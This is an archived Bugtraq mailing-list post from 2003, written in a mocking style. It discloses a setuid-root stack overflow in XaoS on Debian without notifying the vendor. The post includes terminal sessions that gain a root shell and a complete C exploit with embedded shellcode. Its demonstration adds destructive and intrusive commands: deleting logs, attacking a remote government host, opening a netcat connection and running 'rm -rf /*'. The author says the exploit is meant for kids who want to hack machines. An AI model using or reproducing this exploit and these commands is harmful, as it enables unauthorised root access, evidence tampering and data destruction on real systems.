[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: BAZARR LOCAL ROOT AGAIN. HI GUYS. DONT READ THIS
From: "bazarr () ziplip ! com" <bazarr () ziplip ! com>
Date: 2003-06-05 22:27:23
[Download RAW message or body]
bazarr!
["bazarr-episode-4.c" (text/x-csrc)]
/* xaos <= 3.0-23 ? 0day local root xploit on debian 3.0 whoody */
/* by: bazarr */
/* bazarr@ziplip.com */
/* bazarr episode #4 *
*hendy* i dont build nests for da winter, cause i dont have no time for building \
nests
dis is da advisory and xploit at da same time for a local root hole in debian 3.0.
if dave censor dis he out of his mind! dis my second local root xploit in a week!
when bugtraq be heading down south to county jail quick wid all da cross site \
scripting bugs and advisorys for hoolio's ftpd servers (WHO DA HELL IS HOOLIO). lets \
be real about dis advisorys for non popular software are a dime a dozen. i da first \
young boy to come around wid real advisorys in many a months. so please gimmie small \
break.
i release more advisorys den combined times dvdfairy has DoS'd phrack.ru
dats alot!
--- You have been kicked from #openbsd by Dianora
(I have been coding before you were even a glint in your fathers eye. go away)
dianora when i finish "da design and implementation of da 4.4bsd operating system" (A \
BOOK) i be back to challenge you on bsd kernel , den you have no choice but to let me \
stay and give me +v in #openbsd. thank you. (she kicked young 16 year old boy out of \
channel for xposing remote hole in default install!)
ok lets take a look at the vendor info for xaos:
DESCRIPTION
XaoS is a protable real-time interactive fractal zoomer/morpher. UNIX \
version works under X11, SVGA and text terminals. If you don't knwo what fractal is \
or you want to know more about XaoS features you should see animated tutorial. Run \
XaoS and press 'H' twice. It is much more fun than reading of boring manual page \
:) and it supports foregin languages. You might also read xaos.info file for some \
advanced stuff (like how to write animations and tutorials manually, port or extend \
XaoS, algo rithms used etc.)
first thing dat i spot is spelling mistake please patch 'knwo' into 'no' asap.
so we know dat xaos is a program which you zoom around in when you get real \
stoned(seriously). lets get to da local root hole in xaos.
lets take a look at my terminal session wid xaos:
c00l@debian:~/code/dump% ls -al xaos
ls: xaos: No such file or directory
c00l@debian:~/code/dump% #well it aint here so lemme get back to da irc
c00l@debian:~/code/dump% #wait a second! i got an idea
c00l@debian:~/code/dump% ls -al /usr/bin/xaos
-rwsr-xr-x 1 root root 379324 Apr 3 2001 /usr/bin/xaos
c00l@debian:~/code/dump% #suid root?! dat mean if it xploited it will result in uid = \
0 c00l@debian:~/code/dump% #what will i do now?
now what i be doin is dis , bare wid me here fellow security researches (lcamtuf you \
able to keep up wid dis?) lets keep going into dis adventure, lets check if you be \
vulnerable
c00l@debian:~/code/dump% #ok now we be checking if dis xaos is vulnerable to 0day bug \
which i have discovered c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e \
'print "A"x2049'` ^C
c00l@debian:~/code/dump% #ok im not vulnerable i guess
c00l@debian:~/code/dump% #w8 i have an idea!
c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e 'print "A"x20049'`
Segmentation fault
c00l@debian:~/code/dump% #aww crap i be vulnerable , what now?
after auditing for many a days and many a nights to find dis bug i am still weary \
from all of it. so lemme try and keep on going through dis adventure wid xaos, lets \
try and xploit it dis time.
c00l@debian:~/code/dump% ./set #dis put shellcode in enviroment with many a 0x90 \
around it [c00l:dump]$ /usr/bin/xaos -language `perl -e 'print \
"\x45\xfe\xff\xbf"x8096'` -display A Segmentation fault
[c00l:dump]$ #its not xploitable i guess
[c00l:dump]$ #w8 i got an idea
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` \
-display AA Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` \
-display AAA Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` \
-display AAAA sh-2.05a# id ; uname -a
uid=1001(c00l) gid=1001(c00l) euid=0(root) groups=1001(c00l)
Linux debian 2.4.18 #2 SMP Tue Nov 5 21:10:53 EST 2002 i686 unknown
sh-2.05a# # I DID IT
sh-2.05a# exit
exit
[c00l:dump]$ #be ethical and just run uname ; id and exit , thanks!
woa dis be going too fast for some security researchers let me slow down and xplain \
dis.
xaos be doing somthing like dis wid its -language argument
++++++++
char hoolio[4096]; //big as to not allow stack overflow
strcpy(hoolio,argv[i]) //secure
++++++++
but it is NOT secure , a attacker is able to overflow 'hoolio' wid his own data!
den he overwrite da saved return address on da stack with his own and den he execute \
a shell.
-------------
ENDING
xaos is vulnerable to a stack buffer overflow which be yeilding root privleges on \
debian 3.0 (w00dy)
-------------
PATCH
see many a people dont understand dis issue, i am young highschool boy
doing many a bleeding edge freelance security work for free , it not my job to \
provide patch and pamper you. but if you really dont want to get hacked with many a \
0day xploits just dont go online and dont make fun of caddis cuz he be xploiting your \
ftpd in record time to rm you(seriously man).
-------------
VENDORS NOTIFYED
none
-------------
VENDORS VULNERABLE
debain 3.0 & unstable on default install!!!
FreeBSD x.x ports!
OpenBSD x.x ports!
NetBSD x.x ports!!!
anyone who installed xaos!
-------------
XPLOIT
as i promised , dis is da xploit!. if my code looks hoodly poodly its cuz
i have trouble programming after last nights crystal meth ride.
demonstation:
[pan@****.kr]$ cc bazarr-episode-4.c
[pan@****.kr]$ ./a.out aaaa
[*] bazarr :)
sh-2.05a# id
uid=1003(pan) gid=1003(pan) euid=0(root) groups=1003(pan)
sh-2.05a# rm -rf /var/log
sh-2.05a# cc b.c
sh-2.05a# ./a.out -t 39 -h ****.xxtax.gov.cn -s 90 -b
.... ..... .... .... .... ....
done.
sh-2.05a# nc ****.xxtax.gov.cn 31337
sh: nc: command not found
sh-2.05a# rm -rf /* & exit
just compile and run!!! so user friendly its not even funny!
the 'a's are stack padding for da xaos , try 1-4 'a's
woa hey i just made a fool of myself! i dident need any stack padding there.
dis C-code is very complex , do not attempt to modify it.
it is very user friendly though for da following groups:
1. 22 year old php programming cs students
2. younger kids looking to hack boxes! (I LOVE DIS GROUP)
3. professional security researches to make money off highschool boy by using dis \
xploit on der clients and charging dem for it 4. elite lurking blackhat laughing at \
my codez! (I CANT SAY I LIKE DIS GROUP ALL DAT MUCH)
AND NOW THE WORLDS FIRST 4 LINE ROOT XPLOIT PROGRAMMED IN C BY BAZARR
*/
char c[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
int main(int cc,char **a) {char x[256];char \
b[72000];memset(b,0x99,sizeof(b));;;memcpy(b+71968,c,strlen(c));/**/;;b[sizeof(b)]=0;;setenv("C",b,1);
if (!a[1]){printf("[*] bazarr :(\n");exit(1);};/**/;;sprintf(x,"/usr/bin/xaos \
-language `perl -e 'print \"\x45\xfe\xfe\xbf\"x8096'` -display \
%s",a[1]);;;printf("[*] bazarr :)\n");system(x);}
/*
-------------
ADVANCE WARNING
double free() bug in popular suid root application installed by default on debian 3.0 \
comming soon! remote xploit for debian application comming soon!
and so many more i cannot even list dem all(SERIOUSLY).
16 year old boy release more bugs in few weeks den your whole crew does in da last 5 \
years! i think most of you be a little bitter about dat and dats why you some of you \
be anti bazarr. your company should stick to hoolio's ftpd server.
-------------
GREETS
sir hackalot - you cool man! you like the 2pac of hacking. what ever happend to you \
and PHAZE? it been awhile!
-------------
BYE
bye bye guys i gotta go feed the dog and work on math homework.
bye.
-bazarr
*/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic